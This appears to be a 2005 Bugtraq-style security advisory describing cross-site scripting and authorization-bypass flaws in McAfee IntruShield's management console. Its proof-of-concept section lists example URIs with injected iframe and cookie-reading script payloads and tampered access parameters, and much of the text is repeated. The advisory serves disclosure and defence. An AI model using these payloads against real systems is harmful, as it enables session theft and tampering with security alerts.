McAfee IntruShield Security Management System Multiple Vulnerabilities
BID:14167
Info
McAfee IntruShield Security Management System Multiple Vulnerabilities
| Bugtraq ID: | 14167 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 06 2005 12:00AM |
| Updated: | Jul 06 2005 12:00AM |
| Credit: | c0ntex <[email protected]> is credited with the discovery of these issues. |
| Vulnerable: |
McAfee IntruShield Security Management System |
| Not Vulnerable: | |
Discussion
McAfee IntruShield Security Management System Multiple Vulnerabilities
McAfee IntruShield Security Management System is susceptible to multiple vulnerabilities.
The first two issues are cross-site scripting vulnerabilities in the 'intruvert/jsp/systemHealth/SystemEvent.jsp' script. These issues are due to a failure of the application to properly sanitize user-supplied data prior to utilizing it in dynamically generated HTML.
The next two issues are authorization bypass vulnerabilities leading to information disclosure and the ability to acknowledge, de-acknowledge, and delete security alerts.
These vulnerabilities require a valid user account in the affected application.
McAfee IntruShield Security Management System is susceptible to multiple vulnerabilities.
The first two issues are cross-site scripting vulnerabilities in the 'intruvert/jsp/systemHealth/SystemEvent.jsp' script. These issues are due to a failure of the application to properly sanitize user-supplied data prior to utilizing it in dynamically generated HTML.
The next two issues are authorization bypass vulnerabilities leading to information disclosure and the ability to acknowledge, de-acknowledge, and delete security alerts.
These vulnerabilities require a valid user account in the affected application.
Exploit / POC
McAfee IntruShield Security Management System Multiple Vulnerabilities
An exploit is not required.
Example URIs for the cross-site scripting vulnerabilities:
https://www.example.com/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&domainName=%2FDemo%3A0&resourceName=%2FDemo%3A0%2FManager&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=<iframe%20src="http://www.example2.com/"%20width=800%20height=600></iframe>&severity=critical&count=1
https://www.example.com/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&domainName=Demo&resourceName=<script>alert("trouble_ahead")</script><script>alert(document.cookie)</script>&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=critical&count=1
Example URIs for the authentication bypass vulnerabilities:
https://www.example.com:443/intruvert/jsp/reports/reports-column-center.jsp?monitoredDomain=%2FDemo&selectedDomain=0&fullAccessRight=true
https://www.example.com/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=true&faultResourceName=Manager&domainName=%2FDemo%3A0&resourceName=%Demo%3A0%2FManager&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=critical&count=1
An exploit is not required.
Example URIs for the cross-site scripting vulnerabilities:
https://www.example.com/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&domainName=%2FDemo%3A0&resourceName=%2FDemo%3A0%2FManager&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=<iframe%20src="http://www.example2.com/"%20width=800%20height=600></iframe>&severity=critical&count=1
https://www.example.com/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&domainName=Demo&resourceName=<script>alert("trouble_ahead")</script><script>alert(document.cookie)</script>&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=critical&count=1
Example URIs for the authentication bypass vulnerabilities:
https://www.example.com:443/intruvert/jsp/reports/reports-column-center.jsp?monitoredDomain=%2FDemo&selectedDomain=0&fullAccessRight=true
https://www.example.com/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=true&faultResourceName=Manager&domainName=%2FDemo%3A0&resourceName=%Demo%3A0%2FManager&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=critical&count=1
Solution / Fix
McAfee IntruShield Security Management System Multiple Vulnerabilities
Solution:
It is reported that the vendor may have fixes available 13 July, 2005. Users of affected packages should contact the vendor for further information.
Reportedly, the vendor has released fixes for these issues at:
http://www.mcafeesecurity.com/us/downloads/default.asp?wt.mc_n=us_updates&wt.mc_t=ext_li_con&cid=10373
Symantec is unable to verify fix availability at this time. This BID will be updated as further information is disclosed.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
It is reported that the vendor may have fixes available 13 July, 2005. Users of affected packages should contact the vendor for further information.
Reportedly, the vendor has released fixes for these issues at:
http://www.mcafeesecurity.com/us/downloads/default.asp?wt.mc_n=us_updates&wt.mc_t=ext_li_con&cid=10373
Symantec is unable to verify fix availability at this time. This BID will be updated as further information is disclosed.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
McAfee IntruShield Security Management System Multiple Vulnerabilities
References:
References: